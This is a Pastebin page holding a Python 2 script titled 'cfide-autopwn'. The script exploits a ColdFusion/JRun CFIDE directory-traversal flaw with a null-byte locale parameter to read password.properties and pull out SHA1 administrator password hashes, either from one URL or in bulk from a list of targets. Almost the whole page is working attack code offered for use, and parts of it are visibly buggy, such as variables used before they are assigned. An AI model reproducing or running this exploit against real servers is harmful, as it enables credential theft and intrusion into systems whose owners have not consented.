API tools faq
paste
Advertisement
VirusXDz

cfide-autopwn [ Do not modify this ;) ]

VirusXDz
May 25th, 2016
494
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.99 KB | None | 0 0
raw download clone embed print report
  1. import urllib2, re
  2. print "[+] CFIDE Directory Traversal Scanner by VirusXDz"
  3. print "[+] Example URL: 'http://example.com'"
  4. method = raw_input("[+] Enter 1 for default, 2 for jRUN or 3 for list input: ")
  5. if method == "1":
  6.     u = raw_input("[+] URL: ")
  7.     f = urllib2.urlopen(u + "/CFIDE/administrator/enter.cfm").read()
  8.     if '7</strong><br />' in (f):
  9.         print "[+] CFIDE Panel Version 7"
  10.         f1 = urllib2.urlopen(u + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en").read()
  11.         if "password=" in f1:
  12.             print "[+] Payload Injected, Exploit Working"
  13.             sha1s = re.findall('([A-F0-9]{40})',f1)
  14.             for sha1 in sha1s:
  15.                 print "[+] SHA1 Found: " + sha1
  16.             save = raw_input("[+] Would you like to save the source code of the injected page to a file? Y or N: ")
  17.             if save == "Y":
  18.                         savetxt = raw_input("[+] What would you like to name the txt file? E.G. 'test.txt': ")
  19.                         k = open(savetxt,"w")
  20.                         k.write(re.findall('([A-F0-9]{40})',f1))
  21.                         k.close()
  22.                         print "[+] Operation Completed.", savetxt, "saved."
  23.     elif '/CFIDE/administrator/images/spacer.gif' in (f):
  24.                             print "[+] CFIDE Panel Version 8"
  25.                             f2 = urllib2.urlopen(u + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en").read()
  26.                             if "password=" not in f2:
  27.                                 print "[+] Exploit patched, or directory changed"
  28.                             elif "password=" in f2:
  29.                                 print "[+] Payload Injected, Exploit Working"
  30.                                 sha1s = re.findall('([A-F0-9]{40})',f2)
  31.                                 for sha1 in sha1s:
  32.                                     print "[+] SHA1 Found: " + sha1
  33.                                 save = raw_input("[+] Would you like to save the source code of the injected page to a file? Y or N: ")
  34.                                 if save == "Y":
  35.                                     savetxt1 = raw_input("[+] What would you like to name the txt file? E.G. 'test.txt': ")
  36.                                     k = open(savetxt1,"w")
  37.                                     k.write(re.findall('([A-F0-9]{40})',f2))
  38.                                     k.close()
  39.                                     print "[+] Operation Completed.", savetxt1, "saved."
  40. elif method == "2":
  41.     u = raw_input("URL: ")
  42.     f = urllib2.urlopen(u + "/CFIDE/administrator/enter.cfm").read()
  43.     if "password=" not in f:
  44.         print "[+] Unexploitable, You are safe!"
  45.     elif "password=" not in f2:
  46.         print "[+] Unexploitable, You are safe!"
  47.     elif '7</strong><br />' in (f):
  48.         print "[+] CFIDE Panel Version 7"
  49.         f1 = urllib2.urlopen(u + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en").read()
  50.         if "password=" in f1:
  51.             print "[+] Payload Injected, Exploit Working"
  52.             save = raw_input("[+] Would you like to save this file? Y or N: ")
  53.             if save == "Y":
  54.                         savetxt = raw_input("[+] Would you like to save the source code of the injected page to a file? Y or N: ")
  55.                         k = open(savetxt,"w")
  56.                         k.write(re.findall('([A-F0-9]{40})',f1))
  57.                         k.close()
  58.                         print "[+] Operation Completed.", savetxt, "saved."
  59.     elif '/CFIDE/administrator/images/spacer.gif' in (f):
  60.                             print "[+] CFIDE Panel Version 8"
  61.                             f2 = urllib2.urlopen(u + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en").read()
  62.                             if "password=" in f2:
  63.                                 print "[+] Payload Injected, Exploit Working"
  64.                                 save = raw_input("[+] Would you like to save this file? Y or N: ")
  65.                                 if save == "Y":
  66.                                     savetxt1 = raw_input("[+] Would you like to save the source code of the injected page to a file? Y or N: ")
  67.                                     k = open(savetxt1,"w")
  68.                                     k.write(re.findall('([A-F0-9]{40})',f2))
  69.                                     k.close()
  70.                                     print "[+] Operation Completed.", savetxt1, "saved."
  71. elif method == "3":
  72.     open1 = raw_input("[+] Open TXT file containing a list of URLs E.G. 'urls.txt': ")
  73. text_file = open(open1, "r")
  74. lines = [l.strip() for l in open(open1).readlines()]
  75. [l.strip() for l in open(open1).readlines()]
  76. for line in lines:
  77.     f1 = urllib2.urlopen(line + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en").read()
  78.     f2 = urllib2.urlopen(line + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en").read()
  79.     f3 = urllib2.urlopen(line + "/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en").read()
  80.     var1 = line[7:len(line)]
  81.     print var1
  82.     sha1s = re.findall('([A-F0-9]{40})',f1)
  83.     sha2s = re.findall('([A-F0-9]{40})',f2)
  84.     sha3s = re.findall('([A-F0-9]{40})',f3)
  85.     for sha1 in sha1s:
  86.         k = open(str(var1) + ".txt","w")
  87.         k.write(str(sha1s))
  88.         k.write("     " + line)
  89.         k.close()
  90.     for sha2 in sha2s:
  91.         k = open(str(var1) + ".txt","w")
  92.         k.write(str(sha2s))
  93.         k.write("     " + line)
  94.         k.close()
  95.     for sha3 in sha3s:
  96.         k = open(str(var1) + ".txt","w")
  97.         k.write(str(sha3s))
  98.         k.write("     " + line)
  99.         k.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!